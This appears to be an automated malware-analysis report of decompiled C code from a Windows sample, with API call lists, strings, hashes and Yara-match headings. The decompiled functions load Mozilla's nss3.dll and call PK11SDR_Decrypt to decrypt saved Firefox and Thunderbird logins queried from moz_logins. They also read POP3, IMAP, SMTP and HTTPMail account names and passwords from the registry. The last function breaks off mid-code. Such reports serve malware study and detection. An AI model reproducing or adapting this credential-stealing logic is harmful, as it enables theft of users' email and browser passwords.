                                                                        				char _v6708;
                                                                        				char _v7732;
                                                                        				void _v8755;
                                                                        				char _v8756;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t115;
                                                                        				signed int _t116;
                                                                        				int _t118;
                                                                        				void* _t130;
                                                                        				char* _t170;
                                                                        				intOrPtr _t175;
                                                                        				char* _t177;
                                                                        				int _t196;
                                                                        				intOrPtr _t226;
                                                                        				void* _t229;
                                                                        				int* _t232;
                                                                        				char* _t235;
                                                                        				void* _t237;
                                                                        				void* _t238;
                                                                        				void* _t239;
                                                                        				void* _t240;
                                                                        
                                                                        				E004118A0(0x2234, __ecx);
                                                                        				_t226 = _a4;
                                                                        				_t232 = _t226 + 0x30;
                                                                        				_v28 = _t232;
                                                                        				_t115 = E0040DEEE(_t232, _t226 + 0x362);
                                                                        				if(_t115 == 0) {
                                                                        					L43:
                                                                        					return _t115;
                                                                        				}
                                                                        				_t116 = _t232[1];
                                                                        				_t196 = 0;
                                                                        				if(_t116 == 0) {
                                                                        					_t115 = _t116 | 0xffffffff;
                                                                        				} else {
                                                                        					_t115 =  *_t116(_t226 + 0x158);
                                                                        				}
                                                                        				if(_t115 != _t196) {
                                                                        					L41:
                                                                        					if( *_t232 == _t196) {
                                                                        						goto L43;
                                                                        					}
                                                                        					_t118 = SetCurrentDirectoryA( &(_t232[8]));
                                                                        					 *_t232 = _t196;
                                                                        					return _t118;
                                                                        				} else {
                                                                        					_v36 = _t196;
                                                                        					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
                                                                        						L39:
                                                                        						_t232 = _v28;
                                                                        						_t115 = _t232[2];
                                                                        						if(_t115 != _t196) {
                                                                        							_t115 =  *_t115();
                                                                        						}
                                                                        						goto L41;
                                                                        					} else {
                                                                        						_v12 = _t196;
                                                                        						_v1380 = _t196;
                                                                        						memset( &_v1378, _t196, 0x208);
                                                                        						_v852 = _t196;
                                                                        						memset( &_v851, _t196, 0x104);
                                                                        						_t239 = _t238 + 0x18;
                                                                        						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
                                                                        						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
                                                                        						if(_v72 != _t196) {
                                                                        							_v72( &_v852,  &_v12);
                                                                        						}
                                                                        						if(_v12 == _t196) {
                                                                        							goto L39;
                                                                        						}
                                                                        						_a8 = _t196;
                                                                        						if(_v68 != _t196) {
                                                                        							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
                                                                        							_t239 = _t239 + 0x14;
                                                                        						}
                                                                        						L11:
                                                                        						L11:
                                                                        						if(_v64 == _t196) {
                                                                        							_t130 = 0xffff;
                                                                        						} else {
                                                                        							_t130 = _v64(_a8);
                                                                        						}
                                                                        						if(_t130 != 0x64) {
                                                                        							goto L34;
                                                                        						}
                                                                        						_v8756 = _t196;
                                                                        						memset( &_v8755, _t196, 0x3ff);
                                                                        						memset( &_v7732, _t196, 0x1400);
                                                                        						_t240 = _t239 + 0x18;
                                                                        						_t235 = E0040F7EE( &_v72, _a8, 1);
                                                                        						_v20 = E0040F7EE( &_v72, _a8, 6);
                                                                        						_v8 = E0040F7EE( &_v72, _a8, 7);
                                                                        						_v24 = E0040F7EE( &_v72, _a8, 4);
                                                                        						_v32 = E0040F7EE( &_v72, _a8, 5);
                                                                        						_v16 = E0040F7EE( &_v72, _a8, 2);
                                                                        						if(_t235 != _t196) {
                                                                        							strcpy( &_v8756, _t235);
                                                                        						}
                                                                        						if(_v20 != _t196) {
                                                                        							strcpy( &_v7732, _v20);
                                                                        						}
                                                                        						if(_v8 != _t196) {
                                                                        							strcpy( &_v6708, _v8);
                                                                        						}
                                                                        						if(_v24 != _t196) {
                                                                        							strcpy( &_v5684, _v24);
                                                                        						}
                                                                        						if(_v32 != _t196) {
                                                                        							strcpy( &_v4660, _v32);
                                                                        						}
                                                                        						if(_v16 != _t196) {
                                                                        							strcpy( &_v3636, _v16);
                                                                        						}
                                                                        						_v332 = _t196;
                                                                        						memset( &_v331, _t196, 0xff);
                                                                        						_v588 = _t196;
                                                                        						memset( &_v587, _t196, 0xff);
                                                                        						_t239 = _t240 + 0x18;
                                                                        						E0040CD27(_v8, _t226,  &_v588);
                                                                        						E0040CD27(_v20, _t226,  &_v332);
                                                                        						_v8 = _t196;
                                                                        						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
                                                                        							_v16 = _t226 + 0x468;
                                                                        							do {
                                                                        								_t237 = E0040D438(_v8, _v16);
                                                                        								_v2612 = _t196;
                                                                        								memset( &_v2611, _t196, 0x261);
                                                                        								_v1996 = _t196;
                                                                        								memset( &_v1995, _t196, 0x261);
                                                                        								_t86 = _t237 + 0x104; // 0x104
                                                                        								_t229 = _t86;
                                                                        								sprintf( &_v2612, "mailbox://%s", _t229);
                                                                        								sprintf( &_v1996, "imap://%s", _t229);
                                                                        								_push( &_v3636);
                                                                        								_t170 =  &_v2612;
                                                                        								_push(_t170);
                                                                        								L004115B2();
                                                                        								_t239 = _t239 + 0x38;
                                                                        								if(_t170 == 0) {
                                                                        									L31:
                                                                        									_t94 = _t237 + 0x304; // 0x304
                                                                        									E004060D0(0xff, _t94,  &_v588);
                                                                        									_t96 = _t237 + 0x204; // 0x204
                                                                        									E004060D0(0xff, _t96,  &_v332);
                                                                        									_t196 = 0;
                                                                        									goto L32;
                                                                        								}
                                                                        								_push( &_v3636);
                                                                        								_t177 =  &_v1996;
                                                                        								_push(_t177);
                                                                        								L004115B2();
                                                                        								if(_t177 != 0) {
                                                                        									goto L32;
                                                                        								}
                                                                        								goto L31;
                                                                        								L32:
                                                                        								_v8 =  &(_v8[1]);
                                                                        								_t175 = _a4;
                                                                        							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
                                                                        							_t226 = _t175;
                                                                        						}
                                                                        						goto L11;
                                                                        						L34:
                                                                        						if(_a8 != _t196 && _v48 != _t196) {
                                                                        							_v48(_a8);
                                                                        						}
                                                                        						if(_v44 != _t196) {
                                                                        							_v44(_v12);
                                                                        						}
                                                                        						goto L39;
                                                                        					}
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                                          • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                          • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                          • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                                          • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                                          • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                                          • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                          • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                          • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                        • memset.MSVCRT ref: 0040CEA6
                                                                        • memset.MSVCRT ref: 0040CEBF
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                                        • memset.MSVCRT ref: 0040CF68
                                                                        • memset.MSVCRT ref: 0040CF7A
                                                                        • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                                        • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                                        • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                                        • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                                        • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                                        • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                                        • memset.MSVCRT ref: 0040D076
                                                                        • memset.MSVCRT ref: 0040D08A
                                                                        • memset.MSVCRT ref: 0040D0ED
                                                                        • memset.MSVCRT ref: 0040D101
                                                                        • sprintf.MSVCRT ref: 0040D119
                                                                        • sprintf.MSVCRT ref: 0040D12B
                                                                        • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                                        • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                                        Strings
                                                                        • imap://%s, xrefs: 0040D125
                                                                        • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                                        • mailbox://%s, xrefs: 0040D113
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                                        • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                                        • API String ID: 4276617627-3913509535
                                                                        • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                        • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
                                                                        • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                        • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
                                                                        				void _v267;
                                                                        				char _v268;
                                                                        				void _v531;
                                                                        				char _v532;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				int _t39;
                                                                        				void* _t44;
                                                                        				struct HINSTANCE__* _t53;
                                                                        				struct HINSTANCE__* _t56;
                                                                        				struct HINSTANCE__** _t69;
                                                                        
                                                                        				_t69 = __esi;
                                                                        				_v268 = 0;
                                                                        				memset( &_v267, 0, 0x104);
                                                                        				if(_a4 != 0) {
                                                                        					E004060D0(0x104,  &_v268, _a4);
                                                                        				}
                                                                        				if(_v268 != 0) {
                                                                        					GetCurrentDirectoryA(0x104,  &(_t69[8]));
                                                                        					SetCurrentDirectoryA( &_v268);
                                                                        					_v532 = 0;
                                                                        					memset( &_v531, 0, 0x104);
                                                                        					_t39 = strlen("nss3.dll");
                                                                        					_t13 = strlen( &_v268) + 1; // 0x1
                                                                        					if(_t39 + _t13 >= 0x104) {
                                                                        						_v532 = 0;
                                                                        					} else {
                                                                        						E004062AD( &_v532,  &_v268, "nss3.dll");
                                                                        					}
                                                                        					_t44 = GetModuleHandleA( &_v532);
                                                                        					 *_t69 = _t44;
                                                                        					if(_t44 != 0) {
                                                                        						L9:
                                                                        						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
                                                                        						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
                                                                        						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
                                                                        						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
                                                                        						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
                                                                        						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
                                                                        						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
                                                                        					} else {
                                                                        						_t53 = LoadLibraryExA( &_v532, _t44, 8);
                                                                        						 *_t69 = _t53;
                                                                        						if(_t53 != 0) {
                                                                        							goto L9;
                                                                        						} else {
                                                                        							E0040DEA9();
                                                                        							_t56 = LoadLibraryExA( &_v532, 0, 8);
                                                                        							 *_t69 = _t56;
                                                                        							if(_t56 != 0) {
                                                                        								goto L9;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return 0 |  *_t69 != 0x00000000;
                                                                        			}















                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040DF0F
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                        • memset.MSVCRT ref: 0040DF62
                                                                        • strlen.MSVCRT ref: 0040DF6C
                                                                        • strlen.MSVCRT ref: 0040DF7A
                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                        • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                        • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                        • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                        • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                        • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                        • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                        • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                                          • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                          • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                        • API String ID: 1296682400-4029219660
                                                                        • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                        • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                                        • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                        • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 35%
                                                                        			E00402606(void* __ecx, void* __fp0) {
                                                                        				void* __esi;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        				void* _t67;
                                                                        				void* _t70;
                                                                        				void* _t73;
                                                                        				void* _t87;
                                                                        				signed int _t90;
                                                                        				void* _t92;
                                                                        				signed int _t96;
                                                                        				intOrPtr _t100;
                                                                        				intOrPtr _t101;
                                                                        				void* _t103;
                                                                        				void* _t105;
                                                                        				void* _t106;
                                                                        				void* _t108;
                                                                        				void* _t114;
                                                                        
                                                                        				_t114 = __fp0;
                                                                        				_t92 = __ecx;
                                                                        				_t103 = _t105 - 0x6c;
                                                                        				_t106 = _t105 - 0x474;
                                                                        				 *(_t103 + 0x4c) = "POP3 User Name";
                                                                        				 *(_t103 + 0x50) = "IMAP User Name";
                                                                        				 *(_t103 + 0x54) = "HTTPMail User Name";
                                                                        				 *(_t103 + 0x58) = "SMTP USer Name";
                                                                        				 *(_t103 + 0x1c) = "POP3 Server";
                                                                        				 *(_t103 + 0x20) = "IMAP Server";
                                                                        				 *(_t103 + 0x24) = "HTTPMail Server";
                                                                        				 *(_t103 + 0x28) = "SMTP Server";
                                                                        				 *(_t103 + 0x3c) = "POP3 Password2";
                                                                        				 *(_t103 + 0x40) = "IMAP Password2";
                                                                        				 *(_t103 + 0x44) = "HTTPMail Password2";
                                                                        				 *(_t103 + 0x48) = "SMTP Password2";
                                                                        				 *(_t103 + 0x2c) = "POP3 Port";
                                                                        				 *(_t103 + 0x30) = "IMAP Port";
                                                                        				 *(_t103 + 0x34) = "HTTPMail Port";
                                                                        				 *(_t103 + 0x38) = "SMTP Port";
                                                                        				 *(_t103 + 0x5c) = "POP3 Secure Connection";
                                                                        				 *(_t103 + 0x60) = "IMAP Secure Connection";
                                                                        				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
                                                                        				 *(_t103 + 0x68) = "SMTP Secure Connection";
                                                                        				_t90 = 0;
                                                                        				do {
                                                                        					 *(_t103 - 0x64) = 0;
                                                                        					memset(_t103 - 0x63, 0, 0x7f);
                                                                        					_push(_t103 - 0x64);
                                                                        					_t96 = _t90 << 2;
                                                                        					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
                                                                        					_push( *((intOrPtr*)(_t103 + 0x78)));
                                                                        					_t58 = 0x7f;
                                                                        					_t59 = E0040EB80(_t58, _t92);
                                                                        					_t106 = _t106 + 0x18;
                                                                        					if(_t59 == 0) {
                                                                        						E004021D8(_t103 - 0x408);
                                                                        						strcpy(_t103 - 0x1f4, _t103 - 0x64);
                                                                        						_t100 =  *((intOrPtr*)(_t103 + 0x78));
                                                                        						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
                                                                        						_t34 = _t90 + 1; // 0x1
                                                                        						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
                                                                        						_push(_t103 - 0x2f8);
                                                                        						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
                                                                        						_push(_t100);
                                                                        						_t67 = 0x7f;
                                                                        						E0040EB80(_t67, _t92);
                                                                        						_push(_t103 - 0x3fc);
                                                                        						_push("SMTP Display Name");
                                                                        						_push(_t100);
                                                                        						_t70 = 0x7f;
                                                                        						E0040EB80(_t70, _t92);
                                                                        						_push(_t103 - 0x378);
                                                                        						_push("SMTP Email Address");
                                                                        						_push(_t100);
                                                                        						_t73 = 0x7f;
                                                                        						E0040EB80(_t73, _t92);
                                                                        						_t108 = _t106 + 0x2c;
                                                                        						if(_t90 != 3) {
                                                                        							_push(_t103 - 0x278);
                                                                        							_push("SMTP Server");
                                                                        							_push(_t100);
                                                                        							_t87 = 0x7f;
                                                                        							E0040EB80(_t87, _t92);
                                                                        							_t108 = _t108 + 0xc;
                                                                        						}
                                                                        						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
                                                                        						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
                                                                        						_t106 = _t108 + 0x18;
                                                                        						_t101 =  *((intOrPtr*)(_t103 + 0x74));
                                                                        						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
                                                                        						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
                                                                        						_pop(_t92);
                                                                        						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
                                                                        					}
                                                                        					_t90 = _t90 + 1;
                                                                        				} while (_t90 < 4);
                                                                        				return _t59;
                                                                        			}




















                                                                        APIs
                                                                        • memset.MSVCRT ref: 004026AE
                                                                          • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                        • strcpy.MSVCRT(?,?,?,?,?,73AFED80,?,00000000), ref: 004026EC
                                                                        • strcpy.MSVCRT(?,?), ref: 004027A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy$QueryValuememset
                                                                        • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E0040F435(CHAR* __eax) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				void _v267;
                                                                        				char _v268;
                                                                        				void _v531;
                                                                        				char _v532;
                                                                        				void _v787;
                                                                        				char _v788;
                                                                        				void _v1051;
                                                                        				char _v1052;
                                                                        				void _v2075;
                                                                        				char _v2076;
                                                                        				void* __esi;
                                                                        				void* _t45;
                                                                        				void* _t59;
                                                                        				char* _t60;
                                                                        				char* _t71;
                                                                        				char* _t75;
                                                                        				void* _t84;
                                                                        				CHAR* _t89;
                                                                        				void* _t90;
                                                                        				void* _t91;
                                                                        				void* _t92;
                                                                        				void* _t93;
                                                                        
                                                                        				_t89 = __eax;
                                                                        				_v1052 = 0;
                                                                        				memset( &_v1051, 0, 0x104);
                                                                        				_v788 = 0;
                                                                        				memset( &_v787, 0, 0xff);
                                                                        				 *_t89 = 0;
                                                                        				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
                                                                        				_t91 = _t90 + 0x24;
                                                                        				if(_t45 != 0) {
                                                                        					L12:
                                                                        					strcpy(_t89,  &_v1052);
                                                                        					if( *_t89 == 0) {
                                                                        						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
                                                                        						if(E0040F3BA(_t89) == 0) {
                                                                        							 *_t89 = 0;
                                                                        						}
                                                                        						if( *_t89 == 0) {
                                                                        							E00406172(_t89);
                                                                        							if(E0040F3BA(_t89) == 0) {
                                                                        								 *_t89 = 0;
                                                                        							}
                                                                        							if( *_t89 == 0) {
                                                                        								GetCurrentDirectoryA(0x104, _t89);
                                                                        								if(E0040F3BA(_t89) == 0) {
                                                                        									 *_t89 = 0;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return 0 |  *_t89 != 0x00000000;
                                                                        				} else {
                                                                        					_v268 = 0;
                                                                        					memset( &_v267, 0, 0xff);
                                                                        					_v12 = 0;
                                                                        					_t59 = E0040EC05(_v8, 0,  &_v268);
                                                                        					_t92 = _t91 + 0x18;
                                                                        					while(_t59 == 0) {
                                                                        						_push(7);
                                                                        						_t60 =  &_v268;
                                                                        						_push("mozilla");
                                                                        						_push(_t60);
                                                                        						L00411642();
                                                                        						_t93 = _t92 + 0xc;
                                                                        						if(_t60 == 0) {
                                                                        							_v532 = 0;
                                                                        							memset( &_v531, 0, 0x104);
                                                                        							_v2076 = 0;
                                                                        							memset( &_v2075, 0, 0x3ff);
                                                                        							_push( &_v268);
                                                                        							_push("%s\\bin");
                                                                        							_push(0x3ff);
                                                                        							_push( &_v2076);
                                                                        							L00411648();
                                                                        							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
                                                                        							_t71 =  &_v532;
                                                                        							_push(0x5c);
                                                                        							_push(_t71);
                                                                        							L0041164E();
                                                                        							_t93 = _t93 + 0x44;
                                                                        							if(_t71 != 0) {
                                                                        								 *_t71 = 0;
                                                                        							}
                                                                        							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
                                                                        								_push( &_v788);
                                                                        								_t75 =  &_v268;
                                                                        								L004115C4();
                                                                        								_t84 = _t75;
                                                                        								if(_t75 > 0) {
                                                                        									strcpy( &_v1052,  &_v532);
                                                                        									strcpy( &_v788,  &_v268);
                                                                        									_t93 = _t93 + 0x10;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_v12 = _v12 + 1;
                                                                        						_t59 = E0040EC05(_v8, _v12,  &_v268);
                                                                        						_t92 = _t93 + 0xc;
                                                                        					}
                                                                        					RegCloseKey(_v8);
                                                                        					goto L12;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F459
                                                                        • memset.MSVCRT ref: 0040F471
                                                                          • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                        • memset.MSVCRT ref: 0040F4A9
                                                                          • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                        • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                                        • memset.MSVCRT ref: 0040F4F6
                                                                        • memset.MSVCRT ref: 0040F50E
                                                                        • _snprintf.MSVCRT ref: 0040F52B
                                                                        • _mbsrchr.MSVCRT ref: 0040F555
                                                                        • _mbsicmp.MSVCRT ref: 0040F589
                                                                        • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                                        • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E0040F126(void* __edi, char* _a4, char* _a8) {
                                                                        				int _v8;
                                                                        				void _v263;
                                                                        				char _v264;
                                                                        				void _v519;
                                                                        				char _v520;
                                                                        				intOrPtr _t32;
                                                                        				void* _t58;
                                                                        				char* _t60;
                                                                        				void* _t61;
                                                                        				void* _t62;
                                                                        
                                                                        				_t58 = __edi;
                                                                        				_v264 = 0;
                                                                        				memset( &_v263, 0, 0xfe);
                                                                        				_v520 = 0;
                                                                        				memset( &_v519, 0, 0xfe);
                                                                        				_t62 = _t61 + 0x18;
                                                                        				_v8 = 1;
                                                                        				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
                                                                        					_v8 = 0;
                                                                        				}
                                                                        				_t60 = _a4;
                                                                        				 *_t60 = 0;
                                                                        				if(_v8 != 0) {
                                                                        					strcpy(_t60, "<font");
                                                                        					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                        					if(_t32 > 0) {
                                                                        						sprintf( &_v264, " size=\"%d\"", _t32);
                                                                        						strcat(_t60,  &_v264);
                                                                        						_t62 = _t62 + 0x14;
                                                                        					}
